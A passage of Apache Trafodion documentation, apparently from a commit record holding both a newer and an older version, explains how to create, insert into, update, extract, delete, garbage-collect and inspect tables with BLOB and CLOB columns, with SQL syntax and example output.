'LOBH00000200010423909193650389683319694857010382259683718212310961182290216021\"TRAFODION\".\"SEABASE\"');\r\nLOB Length: 4\r\n--- SQL operation complete.\r\n```\r\n\r\n[#considerations]\r\n=== Considerations\r\n\r\n* LOB Max Extract Data Length\r\n+\r\nCQD `LOB_OUTPUT_SIZE` (default 32000) controls the maximum data length that can be extracted.\r\n\r\n* LOB Max Extract Chunk Length\r\n+\r\nCQD `LOB_MAX_CHUNK_MEM_SIZE` (512 MB expressed in bytes [536870912]) controls the maximum chunk of data that can be read from HDFS into memory and written to the target file location. \r\n\r\n* LOB Max Size\r\n+\r\nCQD `LOB_MAX_SIZE` (default 10G expressed in M [10000M]).\r\n\r\n* Extract Target Locations\r\n+\r\nThe file to extract to can be a local linux file or a local HDFS file.\r\n\r\n[#deleting column from a sql table containing lob columns]\r\n== Deleting Column from a SQL Table Containing LOB Columns\r\n\r\n[#syntax]\r\n=== Syntax\r\n\r\n```\r\nDELETE lob-column-name FROM table-name [WHERE CLAUSE]\r\n```\r\n\r\n[#considerations]\r\n=== Considerations\r\n\r\nWhen one or more rows containing LOB columns are deleted from a LOB table, only the metadata information is dropped and the hdfs data remains as it is. The references to the lob data are removed from the lob descriptor file. \r\n\r\nThis mechanism has not been implemented yet as a separate utility but it is triggered as a part of insert, update and append operations. For more information, see <<garbage collection,Garbage Collection>>.\r\n\r\n[#dropping a sql table containing lob columns ]\r\n== Dropping a SQL Table Containing LOB Columns \r\n\r\nDrop works like any other drop table. All dependent tables are deleted. All hdfs files (data and descriptor) are also deleted.\r\n\r\nFor more information, see <<drop_table_statement,DROP TABLE Statement>> in the http:\/\/trafodion.incubator.apache.org\/docs\/sql_reference\/index.html[Trafodion SQL Reference Manual].\r\n\r\n[#garbage collection]\r\n== Garbage Collection\r\n\r\nWhen a lob datafile for a column has reached a certain limit, defined by the CQD `LOB_GC_LIMIT_SIZE`, a compaction is triggered automatically. +\r\nThe default Garbage Collection (GC) Limit is 10GB and can be changed if needed. \r\n\r\nThe need for GC arises because when a delete operation or an update operation is performed, the old data block in the hdfs file will be left as unused. 
+\r\nIn the case of update, the old data will be left as unused and the new data will be written into a new section, so all these \u201choles\u201d in the LOB data file are needlessly occupying space. \r\n\r\nThe LOB descriptor chunks file is looked at to see which ranges and offsets are actually used. The LOB datafile is temporarily saved. The compaction is done into a new tempfile. When the sections have all been copied into the tempfile, Trafodion will delete the existing lob data file and rename the tempfile. \r\n\r\nFinally, the saved copy of the LOB datafile is dropped. The saved copy is there just in case you need to fall back to it in case of an error. Since this operation is triggered as part of an IUD operation, a definite slowdown will occur for that insert\/update operation compared to subsequent inserts\/updates. \r\n\r\nAlso, each lob column of a table can be compacted separately as needed. GC does not have to be done to all columns of the LOB table all at once. \r\n\r\nNOTE: Currently the GC is done in the same transaction as the transaction being used for the insert or update operation. If any part of the GC fails, then the entire transaction is aborted. \r\n\r\nWhen Trafodion has support for local transactions, Trafodion will do the GC in a separate transaction or in a separate process, so you can fail the GC with a warning and allow the insert to go through. \r\n\r\nSetting the CQD `LOB_GC_LIMIT_SIZE` to 0 would prevent GC from occurring.\r\n\r\n[#cleanup of a sql table containing lob columns]\r\n== Cleanup of a SQL Table Containing LOB Columns\r\n\r\nCleanup works like cleanup of any other table. The command ensures all dependent SQL LOB tables and hdfs files are dropped ignoring errors if any.\r\n\r\nFor more information, see <<cleanup_statement,CLEANUP Statement>> in http:\/\/trafodion.incubator.apache.org\/docs\/sql_reference\/index.html[Trafodion SQL Reference Manual].\r\n\r\n[#showddl for lob]\r\n== SHOWDDL for LOB\r\n\r\nSHOWDDL for LOB with a special option will show all the dependent objects, names and details about the table.\r\n\r\n[#syntax]\r\n=== Syntax\r\n\r\n```\r\nSHOWDDL table-name, LOB DETAILS\r\n```\r\n\r\n[#examples]\r\n=== Examples\r\n\r\n* This example displays the details of the table t1ob1.\r\n\r\n+\r\n\r\n```\r\n>>SHOWDDL tlob1, LOB DETAILS;\r\nCREATE TABLE TRAFODION.SEABASE.TLOB1\r\n (\r\n C1 INT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , C2 BLOB DEFAULT NULL NOT SERIALIZED\r\n , PRIMARY KEY (C1 ASC)\r\n )\r\n;\r\n\r\nLOB Metadata\r\n============\r\n\r\nCREATE TABLE TRAFODION.SEABASE.LOBMD_04239091936503896833\r\n (\r\n LOBNUM SMALLINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , STORAGETYPE SMALLINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , LOCATION VARCHAR(4096) CHARACTER SET ISO88591 COLLATE DEFAULT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , PRIMARY KEY (LOBNUM ASC)\r\n )\r\n;\r\n\r\n************************************************\r\nLobNum: 1\r\n\r\nData Storage\r\n============\r\n\r\nLocation: \/user\/trafodion\/lobs\r\nDataFile: LOBP_04239091936503896833_0001\r\n\r\nLOB Descriptor Handle\r\n=====================\r\n\r\nCREATE TABLE TRAFODION.SEABASE.\"LOBDescHandle_04239091936503896833_0001\"\r\n (\r\n DESCPARTNKEY LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , NUMCHUNKS INT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , LOBLEN LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n )\r\n STORE BY (DESCPARTNKEY ASC)\r\n SALT USING 8 PARTITIONS\r\n;\r\n\r\nLOB Descriptor 
Chunks\r\n=====================\r\n\r\nCREATE TABLE TRAFODION.SEABASE.\"LOBDescChunks_04239091936503896833_0001\"\r\n (\r\n DESCPARTNKEY LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , DESCSYSKEY LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , CHUNKNUM INT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , CHUNKLEN LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , INTPARAM LARGEINT DEFAULT NULL SERIALIZED\r\n , STRINGPARAM VARCHAR(400) CHARACTER SET ISO88591 COLLATE DEFAULT DEFAULT NULL SERIALIZED\r\n , PRIMARY KEY (DESCPARTNKEY ASC, DESCSYSKEY ASC, CHUNKNUM ASC)\r\n )\r\n SALT USING 8 PARTITIONS\r\n;\r\n\r\n--- SQL operation complete.\r\n```\r\n\r\n* This example displays the details of the table tlob130ext.\r\n\r\n+\r\n\r\n```\r\n>>CREATE TABLE tlob130ext (c1 INT NOT NULL, c2 BLOB, c3 CLOB, c4 BLOB STORAGE 'EXTERNAL', primary key (c1));\r\n\r\n--- SQL operation complete.\r\n\r\n>>SHOWDDL tlob130ext, LOB DETAILS;\r\n\r\nCREATE TABLE TRAFODION.SCH.TLOB130EXT\r\n (\r\n C1 INT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , C2 BLOB DEFAULT NULL NOT SERIALIZED\r\n , C3 CLOB DEFAULT NULL NOT SERIALIZED\r\n , C4 BLOB DEFAULT NULL NOT SERIALIZED\r\n , PRIMARY KEY (C1 ASC)\r\n )\r\n;\r\n\r\nLOB Metadata\r\n============\r\n\r\nCREATE TABLE TRAFODION.SCH.LOBMD__04474425229029907479\r\n (\r\n LOBNUM SMALLINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , STORAGETYPE SMALLINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , LOCATION VARCHAR(4096) CHARACTER SET ISO88591 COLLATE DEFAULT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , PRIMARY KEY (LOBNUM ASC)\r\n )\r\n;\r\n\r\n************************************************\r\nLobNum: 1\r\n\r\nData Storage\r\n============\r\n\r\nLocation: \/user\/trafodion\/lobs\r\nDataFile: LOBP_04474425229029907479_0001\r\n\r\nLOB Descriptor Handle\r\n=====================\r\n\r\nCREATE TABLE TRAFODION.SCH.\"LOBDescHandle__04474425229029907479_0001\"\r\n (\r\n DESCPARTNKEY LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , NUMCHUNKS INT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , LOBLEN LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n )\r\n STORE BY (DESCPARTNKEY ASC)\r\n SALT USING 8 PARTITIONS\r\n;\r\n\r\nLOB Descriptor Chunks\r\n=====================\r\n\r\nCREATE TABLE TRAFODION.SCH.\"LOBDescChunks__04474425229029907479_0001\"\r\n (\r\n DESCPARTNKEY LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , DESCSYSKEY LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , CHUNKNUM INT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , CHUNKLEN LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , DATAOFFSET LARGEINT DEFAULT NULL SERIALIZED\r\n , STRINGPARAM VARCHAR(400) CHARACTER SET ISO88591 COLLATE DEFAULT DEFAULT NULL SERIALIZED\r\n , PRIMARY KEY (DESCPARTNKEY ASC, DESCSYSKEY ASC, CHUNKNUM ASC)\r\n )\r\n SALT USING 8 PARTITIONS\r\n;\r\n\r\n************************************************\r\nLobNum: 2\r\n\r\nData Storage\r\n============\r\n\r\nLocation: \/user\/trafodion\/lobs\r\nDataFile: LOBP_04474425229029907479_0002\r\n\r\nLOB Descriptor Handle\r\n=====================\r\n\r\nCREATE TABLE TRAFODION.SCH.\"LOBDescHandle__04474425229029907479_0002\"\r\n (\r\n DESCPARTNKEY LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , NUMCHUNKS INT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , LOBLEN LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n )\r\n STORE BY (DESCPARTNKEY ASC)\r\n SALT USING 8 PARTITIONS\r\n;\r\n\r\nLOB Descriptor 
Chunks\r\n=====================\r\n\r\nCREATE TABLE TRAFODION.SCH.\"LOBDescChunks__04474425229029907479_0002\"\r\n (\r\n DESCPARTNKEY LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , DESCSYSKEY LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , CHUNKNUM INT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , CHUNKLEN LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , DATAOFFSET LARGEINT DEFAULT NULL SERIALIZED\r\n , STRINGPARAM VARCHAR(400) CHARACTER SET ISO88591 COLLATE DEFAULT DEFAULT NULL SERIALIZED\r\n , PRIMARY KEY (DESCPARTNKEY ASC, DESCSYSKEY ASC, CHUNKNUM ASC)\r\n )\r\n SALT USING 8 PARTITIONS\r\n;\r\n\r\n************************************************\r\nLobNum: 3\r\n\r\nData Storage\r\n============\r\n\r\n<External HDFS location>\r\n<External HDFS file>\r\n\r\nLOB Descriptor Handle\r\n=====================\r\n\r\nCREATE TABLE TRAFODION.SCH.\"LOBDescHandle__04474425229029907479_0003\"\r\n (\r\n DESCPARTNKEY LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , NUMCHUNKS INT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , LOBLEN LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n )\r\n STORE BY (DESCPARTNKEY ASC)\r\n SALT USING 8 PARTITIONS\r\n;\r\n\r\nLOB Descriptor Chunks\r\n=====================\r\n\r\nCREATE TABLE TRAFODION.SCH.\"LOBDescChunks__04474425229029907479_0003\"\r\n (\r\n DESCPARTNKEY LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , DESCSYSKEY LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , CHUNKNUM INT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , CHUNKLEN LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , DATAOFFSET LARGEINT DEFAULT NULL SERIALIZED\r\n , STRINGPARAM VARCHAR(400) CHARACTER SET ISO88591 COLLATE DEFAULT DEFAULT NULL SERIALIZED\r\n , PRIMARY KEY (DESCPARTNKEY ASC, DESCSYSKEY ASC, CHUNKNUM ASC)\r\n )\r\n SALT USING 8 PARTITIONS\r\n;\r\n\r\n--- SQL operation complete.\r\n```\r\n\r\n[#get lob statistics for a lob table]\r\n== Get Lob Statistics for a LOB Table\r\n\r\nThere are two ways to get lob statistics for a lob table:\r\n\r\n* Get Statement: the lob information is formatted for human readability.\r\n* Select Statement: the lob information is formatted for machine readability.\r\n\r\n[#get statement]\r\n=== Get Statement\r\n\r\n[#syntax]\r\n==== Syntax\r\n\r\n```\r\nGET LOB STATS FOR TABLE table-name;\r\n```\r\n\r\n[#examples]\r\n==== Examples\r\n\r\n* This Get Statement displays statistics for the table tlob130gt2.\r\n\r\n+\r\n\r\n```\r\n>>CREATE TABLE tlob130gt2 (c1 INT NOT NULL, c2 BLOB, c3 CLOB, c4 BLOB STORAGE 'EXTERNAL', PRIMARY KEY (c1));\r\n\r\n--- SQL operation complete.\r\n\r\n>>GET LOB STATS FOR TABLE tlob130gt2;\r\n\r\nLob Information for table: \"TRAFODION\".LOB130.TLOB130GT2\r\n=========================\r\n\r\nColumnName: C2\r\nLob Location: \/user\/trafodion\/lobs\r\nLOB Data File: LOBP_07468755986685501835_0001\r\nLOB EOD: 0\r\nLOB Used Len: 0\r\nColumnName: C3\r\nLob Location: \/user\/trafodion\/lobs\r\nLOB Data File: LOBP_07468755986685501835_0002\r\nLOB EOD: 0\r\nLOB UsedLen: 0\r\nColumnName: C4\r\nLob Location: External HDFS Location\r\nLOB Data File: External HDFS File\r\nLOB EOD: 0\r\nLOB Used Len: 0\r\n--- SQL operation complete.\r\n```\r\n\r\n[#select statement]\r\n=== Select Statement\r\n\r\n[#syntax]\r\n==== Syntax\r\n\r\n```\r\nSELECT * FROM TABLE(LOB STATS table-name);\r\n```\r\n\r\n[#examples]\r\n==== Examples\r\n\r\n* This Select Statement displays statistics for the table tlob130gt.\r\n\r\n+\r\n\r\n```\r\n>>CREATE TABLE tlob130gt (c1 
INT NOT NULL, c2 BLOB, c3 CLOB, c4 BLOB, PRIMARY KEY (c1));\r\n\r\n--- SQL operation complete.\r\n\r\n>>SELECT left(trim(catalog_name) || '.' || trim(schema_name) || '.' || trim(object_name) , 20), \r\nleft(trim(column_name),5), \r\nleft(trim(lob_location),5), \r\nleft(trim(lob_data_file),20),\r\nLOB_DATA_FILE_SIZE_EOD,\r\nLOB_DATA_FILE_SIZE_USED \r\nFROM TABLE(lob stats(tlob130gt));\r\n\r\n(EXPR) (EXPR) (EXPR) (EXPR) LOB_DATA_FILE_SIZE_EOD LOB_DATA_FILE_SIZE_USED\r\n------ ------ ------ ------ ---------------------- ----------------------\r\n\r\nTRAFODION.SCH.TLOB13 C2 \/user\/trafodion\/lobs LOBP_044744252290302 15 10\r\nTRAFODION.SCH.TLOB13 C3 \/user\/trafodion\/lobs LOBP_044744252290302 15 10\r\nTRAFODION.SCH.TLOB13 C4 \/user\/trafodion\/lobs LOBP_044744252290302 45 30\r\n\r\n--- 3 row(s) selected.\r\n```\r\n\r\n* This Select Statement displays statistics for the table tlob130gt2.\r\n\r\n+\r\n\r\n```\r\n>>CREATE TABLE tlob130gt2 (c1 INT NOT NULL, c2 BLOB, c3 CLOB, c4 BLOB STORAGE 'EXTERNAL', PRIMARY KEY (c1));\r\n\r\n--- SQL operation complete.\r\n\r\n>>SELECT left(trim(catalog_name) || '.' || trim(schema_name) || '.' || trim(object_name), 20), \r\nleft(trim(column_name),5), \r\nleft(trim(lob_location),15), \r\nleft(trim(lob_data_file),20),\r\nLOB_DATA_FILE_SIZE_EOD,\r\nLOB_DATA_FILE_SIZE_USED \r\nFROM TABLE(lob stats(tlob130gt2));\r\n\r\n(EXPR) (EXPR) (EXPR) (EXPR) LOB_DATA_FILE_SIZE_EOD LOB_DATA_FILE_SIZE_USED\r\n------ ------ ------ ------ ---------------------- ----------------------\r\n\r\nTRAFODION.SCH.TLOB13 C2 \/user\/trafodion\/lobs LOBP_044744252290300\u00a0 0 0\r\nTRAFODION.SCH.TLOB13 C3 \/user\/trafodion\/lobs LOBP_044744252290300 0 0\r\nTRAFODION.SCH.TLOB13 C4 External HDFS Location\u00a0External HDFS File 0 0\r\n\r\n--- 3 row(s) selected.\r\n```","old_contents":"\/\/\/\/\r\n\/**\r\n* @@@ START COPYRIGHT @@@\r\n*\r\n* Licensed to the Apache Software Foundation (ASF) under one\r\n* or more contributor license agreements. See the NOTICE file\r\n* distributed with this work for additional information\r\n* regarding copyright ownership. The ASF licenses this file\r\n* to you under the Apache License, Version 2.0 (the\r\n* \"License\"); you may not use this file except in compliance\r\n* with the License. You may obtain a copy of the License at\r\n*\r\n* http:\/\/www.apache.org\/licenses\/LICENSE-2.0\r\n*\r\n* Unless required by applicable law or agreed to in writing,\r\n* software distributed under the License is distributed on an\r\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\r\n* KIND, either express or implied. 
See the License for the\r\n* specific language governing permissions and limitations\r\n* under the License.\r\n*\r\n* @@@ END COPYRIGHT @@@\r\n*\/\r\n\/\/\/\/\r\n\r\n[#working with lobs]\r\n= Working with LOBs\r\n\r\n[#creating a sql table with lob columns]\r\n== Creating a SQL Table with LOB Columns\r\n\r\nWhen creating a SQL table with LOB columns, following relevant tables and files are created as well:\r\n\r\n* One LOB MD table.\r\n* Two dependent descriptor tables.\r\n* HDFS data file (locates at \/user\/trafodion\/lobs) for each column.\r\n\r\n[#syntax]\r\n== Syntax\r\n\r\n```\r\nCREATE TABLE table-name (column-spec[, column-spec]\u2026)\r\n```\r\n\r\n```\r\ncolumn-spec is:\r\nlob-column-spec | \r\nother-column-spec\r\n\r\nlob-column-spec is:\r\ncolumn-name {lob-data-type}[column-constraint]\r\n\r\nother-column-spec is:\r\ncolumn-name {data-type}[column-constraint]\r\n\r\nlob-data-type is:\r\nBLOB | CLOB [({numeric literal} [unit])] [STORAGE 'storage literal']\r\n\r\nunit is:\r\nempty | \r\nK | \r\nM | \r\nG \r\n```\r\n\r\n[#semantics]\r\n=== Semantics\r\n\r\n* `_storage literal_`\r\n\r\n+\r\nCurrently Trafodion only supports `'EXTERNAL'` here. \r\n\r\n+\r\nExternal LOB object that are not managed by Trafodion.\r\n\r\n* `_empty_`\r\n\r\n+\r\nNumber of bytes specified by the numeric literal.\r\n\r\n* `_K_`\r\n\r\n+\r\nNumeric literal value * 1024.\r\n\r\n* `_M_`\r\n\r\n+\r\nNumeric literal value * 1024 * 1024.\r\n\r\n* `_G_`\r\n\r\n+\r\nNumeric literal value * 1024 * 1024 * 1024.\r\n\r\n[#examples]\r\n=== Examples\r\n\r\n* This example creates a table tlob1 with 2 columns and primary key on the c1.\r\n\r\n+\r\n\r\n```\r\nCREATE TABLE tlob1 (c1 INT NOT NULL, c2 BLOB, PRIMARY KEY (c1));\r\n```\r\n\r\n* This example creates a table tlob2 with 3 columns and primary key on the c1.\r\n\r\n+\r\n\r\n```\r\nCREATE TABLE tlob2 (c1 INT NOT NULL, c2 BLOB, c3 CLOB, PRIMARY KEY (c1));\r\n```\r\n\r\n* This example creates a table tlob130txt_limit50 with 2 columns and primary key on the c1.\r\n\r\n+\r\n\r\n```\r\nCREATE TABLE tlob130txt_limit50 (c1 INT NOT NULL, c2 CLOB(50), PRIMARY KEY (c1));\r\n```\r\n\r\n* This example creates a table tlob130bin_limit1K with 2 columns and primary key on the c1.\r\n\r\n+\r\n\r\n```\r\nCREATE TABLE tlob130bin_limit1K (c1 INT NOT NULL, c2 BLOB(1 K), PRIMARY KEY (c1));\r\n```\r\n\r\n* This example creates a table tlob130ext with 4 columns and primary key on the c1.\r\n\r\n+\r\n\r\n```\r\nCREATE TABLE tlob130ext (c1 INT NOT NULL, c2 BLOB, c3 CLOB, c4 BLOB STORAGE 'EXTERNAL', PRIMARY KEY (c1));\r\n```\r\n\r\n[#hdfs location of lob data]\r\n=== HDFS Location of LOB Data\r\n\r\nWhen a LOB table is created, the underlying LOB data needs to be stored in HDFS. It is in the \/user\/trafodion\/lobs by default. \r\n\r\nAll columns of a table that are declared as LOB types will have all their data in one file derived from the table's Object UID and the LOB number of that column which gets assigned during creation.\r\n\r\nThe following is a LOB file with 2 columns you will see 2 files in HDFS:\r\n\r\n\/user\/trafodion\/lobs\/LOBP_03683514167332904796_0001\r\n\r\n\/user\/trafodion\/lobs\/LOBP_03683514167332904796_0002\r\n\r\nAs rows are added to this table, the LOB data for each row gets appended to the corresponding column\u2019s LOB data file. 
\r\n\r\n[#inserting into a sql table containing lob columns]\r\n== Inserting into a SQL Table Containing LOB Columns\r\n\r\n[#syntax]\r\n=== Syntax\r\n\r\n```\r\nINSERT INTO table-name [(target-col-list)] insert-source\r\n```\r\n\r\n```\r\ntarget-col-list is: \r\ncolname[, colname]... \r\n\r\ninsert-source is: \r\nVALUES(column-expr[, column-expr]...)\r\n\r\ncolumn-expr is:\r\nlob-query-expr |\r\nother-query-expr\r\n\r\nlob-query-expr is: \r\nNULL | ? |\r\nEMPTY_BLOB() |\r\nEMPTY_CLOB() | \r\nSTRINGTOLOB('string literal expression') |\r\nFILETOLOB('lob source file name') |\r\nBUFFERTOLOB(LOCATION lob source buffer address, LENGTH lob length value) |\r\nEXTERNALTOLOB('external lob source file name') \r\n\r\nlob source file name is:\r\nhdfs:\/\/\/{local hdfs file name} | \r\n{local linux file name} |\r\n{file:\/\/\/linux file name} \r\n\r\nexternal lob source file name is: \r\nhdfs:\/\/\/{local hdfs file name}\r\n``` \r\n[#semantics]\r\n=== Semantics\r\n\r\n* `_other-query-expr_`\r\n+\r\nFor the syntax and description of `_other-query-expr_`, see the `_query-expr_` in the <<select_statement,SELECT Statement>>.\r\n\r\n* `_EMPTY_BLOB(), EMPTY_CLOB()_`\r\n+\r\nReturns an empty LOB handle. \r\n\r\n* `_STRINGTOLOB_`\r\n+\r\nConverts a simple string literal into LOB format. \r\n\r\n** `_string literal expression_`\r\n+\r\nis a series of characters enclosed in single quotes.\r\n\r\n* `_FILETOLOB_`\r\n+\r\nConverts data from a local linux\/hdfs file into LOB format.\r\n\r\n* `_BUFFERTOLOB_`\r\n+\r\nTakes an address and a size of an input buffer, and converts the data pointed to by that buffer into LOB. \r\n\r\n** `_lob source buffer address_`\r\n+\r\nThe long value of the user buffer address in int64.\r\n\r\n** `_lob length value_`\r\n+\r\nThe length of the user specified lob buffer in int64.\r\n\r\n[#considerations]\r\n=== Considerations\r\n\r\nThe source for inserting into a LOB can be any of the following:\r\n\r\n* A parameter.\r\n+\r\nAn unnamed parameter can be used to prepare a statement and then during an execution, either a function or a simple string parameter can be passed in which will be converted to LOB data.\r\n\r\n* `EMPTY_BLOB()` or `EMPTY_CLOB()` \r\n\r\n** If `EMPTY_BLOB()` or `EMPTY_CLOB()` is specified, then a dummy lob handle is created. \r\n\r\n*** No data is associated with the empty LOBs yet, but these dummy LOB handles can later be used to populate with new LOB data. If the LOB had data previously associated with it, it will be erased.\r\n\r\n*** The dummy LOB handle will get the same datatype as the underlying column.\r\n+\r\nFor example, if the LOB column was defined as `'EXTERNAL'` during table creation, then the LOB column gets that type. If it\u2019s not defined, then it is considered as a regular LOB. \r\n\r\n** An empty LOB is distinct from a LOB containing a string of length zero or a null LOB.\r\n\r\n* An in-memory LOB which is simple string data. \r\n+\r\nTo insert a string literal, you need to provide `STRINGTOLOB('string literal expression')`.\r\n\r\n* An on-platform file (linux\/hdfs file) containing binary or text data.\r\n+\r\nTo insert an on-platform file, you need to provide `FILETOLOB('lob source file name')`. 
\r\n\r\n* A user buffer of a specified length allocated in user space.\r\n+\r\nTo insert a buffer, you need to provide the address and size of the buffer.\r\n\r\n* An external LOB.\r\n+ \r\nWhen an external LOB is specified via `EXTERNALTOLOB('external lob source file name')`, the data associated with the external HDFS file is not transferred into the Trafodion LOB. Instead, Trafodion stores the file path\/handle of the external file. \r\n+\r\nFor example, if you have a directory of pictures, you can specify the full hdfs path to each picture file to this function and the path will get stored in the Trafodion table. Later during retrieval, the file name will be used to go to the actual file to retrieve the data. \r\n\r\n[#examples]\r\n=== Examples\r\n\r\n* This example uses the `STRINGTOLOB` function that converts a simple string literal into LOB format before inserting.\r\n+\r\n```\r\nINSERT INTO tlob1 VALUES(1,stringtolob('inserted row'));\r\n```\r\n\r\n* This example uses the `FILETOLOB` function that converts data from a local file into LOB format, and stores all data into HDFS associated with that value.\r\n+\r\n```\r\nINSERT INTO tlob130txt1 VALUES(1,filetolob('lob_input_a1.txt'));\r\n```\r\n\r\n* This example takes an int64 value as an input which is an address to a buffer and a size parameter. The buffer contents are converted to LOB format and stored in HDFS.\r\n+\r\n```\r\nINSERT INTO tlob1 VALUES (1, buffertolob(LOCATION 124647474, SIZE 2048));\r\n```\r\n\r\n* This example uses different functions to convert strings, files, external lob into LOB data. The EXTERNALTOLOB function takes an external file. \r\n+\r\n```\r\nINSERT INTO tlob130ext VALUES(1, STRINGTOLOB('first lob'), \r\nFILETOLOB('hdfs:\/\/\/lobs\/lob_input_a1.txt'), \r\nEXTERNALTOLOB('hdfs:\/\/\/lobs\/lob_input_a1.txt'));\r\n```\r\n\r\n* This example uses a parameter.\r\n+\r\n```\r\nPREPARE S FROM INSERT INTO t130lob2 VALUES (1, ?);\r\nEXECUTE S USING 'fgfgfhfhfhfhhfhfhfhjfkkfkffllflflfll';\r\n```\r\n\r\n* This example uses the `EMPTY_BLOB` function to insert an empty lob and creates a dummy lob handle. \r\n+\r\n```\r\nINSERT INTO t130lob2 VALUES (1, empty_blob());\r\n```\r\n\r\n[#inserting into a sql table containing lob columns using select clause]\r\n== Inserting into a SQL Table Containing LOB Columns Using Select Clause\r\n\r\n[#syntax]\r\n=== Syntax\r\n\r\n```\r\nINSERT INTO target-table [(target-col-list-expr)] SELECT [source-col-list-expr] FROM source-table\r\n```\r\n\r\n```\r\ntarget-col-list-expr is: \r\ntarget-colname[, target-colname]...\r\n\r\ntarget-colname is: \r\nlob-column-name |\r\nother-column-name\r\n\r\nsource-col-list-expr is: \r\nsource-colname[, source-colname]...\r\n\r\nsource-colname is: \r\nhive varchar column name | \r\ntrafodion varchar column name | \r\ntrafodion char column name |\r\ntrafodion lob column name\r\n\r\nsource-table is: \r\nhive table |\r\ntrafodion table \r\n```\r\n\r\n[#semantics]\r\n=== semantics\r\n\r\n* `_target-col-list-expr_`\r\n+\r\nnames a single column or multiple columns enclosed in parentheses in the target table in which to insert values. \r\n\r\n+\r\nThe data type of each target column must be compatible with the data type of its corresponding source value. 
\r\n\r\n+\r\nWithin the list, each target column must have the same position as its associated source value.\r\n\r\n** `_target-colname_` \r\n+\r\nis a SQL identifier that specifies a target column name.\r\n\r\n* `_source-col-list-expr_`\r\n+\r\nnames a single column or multiple columns enclosed in parentheses in the source table from which to get values. \r\n\r\n** `_source-colname_` \r\n+\r\nis a SQL identifier that specifies a source column name.\r\n\r\n[#considerations]\r\n=== Considerations\r\n\r\nWhen inserting from a source Trafodion table column into a target table, the source column subtype of the LOB column needs to match the target table column. That is, you cannot insert from an external LOB column into a regular LOB column in the target. They both need to be the same type. \r\n\r\nThe source for the *select clause* can be any of the following: \r\n\r\n* A source hive table column that is a hive varchar column\r\n* A source table column that is a Trafodion varchar, char and LOB column\r\n* A source table column that is also a LOB datatype.\r\n\r\n[#examples]\r\n=== Examples \r\n* This example inserts the first 10 rows of d_date_sk and d_date_id selected from the source hive table hive.hive.date_dim into the target table t130lob2.\r\n+\r\n```\r\nINSERT INTO t130lob2 SELECT [first 10] d_date_sk,d_date_id FROM hive.hive.date_dim;\r\n```\r\n\r\n* This example inserts the c1 and c2 selected from the source Trafodion table t130var into the c1 and c2 of the target table t130lob2.\r\n+\r\n```\r\nINSERT INTO t130lob2(c1,c2) SELECT c1,c2 FROM t130var;\r\n```\r\n\r\n* This example inserts the c1 and c2 selected from the source Trafodion table t130char into the c1 and c2 of the target table t130lob2.\r\n+\r\n```\r\nINSERT INTO t130lob2(c1,c2) SELECT c1,c2 FROM t130char;\r\n```\r\n\r\n* This example inserts the c1, c2 and c3 selected from the source Trafodion table t130lob2 into the target table t130lob3, and then shows the result.\r\n+\r\n```\r\nINSERT INTO t130lob3 SELECT c1,c2,c3 FROM t130lob2;\r\nSELECT c1,lobtostring(c2,100),lobtostring(c3,100) FROM t130lob3;\r\n```\r\n\r\n[#updating a sql table containing lob columns]\r\n== Updating a SQL Table Containing LOB Columns\r\n\r\nThe source for updating a LOB can be divided into 2 groups:\r\n\r\n* Update using parameters\/functions\r\n* Update using LOB handle\r\n\r\n[#updating using parameters\/functions]\r\n=== Updating Using Parameters\/Functions\r\n\r\nThe following parameters\/functions can be used to update.\r\n\r\n* A parameter\r\n* `EMPTY_BLOB` or `EMPTY_CLOB`\r\n* An in-memory lob which is a simple string data \r\n+\r\nTo insert this string, a literal needs to be provided\r\n* An on-platform file (linux\/hdfs file) containing text or binary data \r\n* A user buffer of a specified length allocated in user space\r\n* An external LOB file in HDFS\r\n\r\n[#syntax]\r\n==== Syntax \r\n\r\n```\r\nUPDATE table-name {set-clause-type1 | set-clause-type2} \r\n```\r\n\r\n```\r\nset-clause-type1 is: \r\nSET set-clause[, set-clause ].. \r\n\r\nset-clause is: \t\r\nlob_column-name = 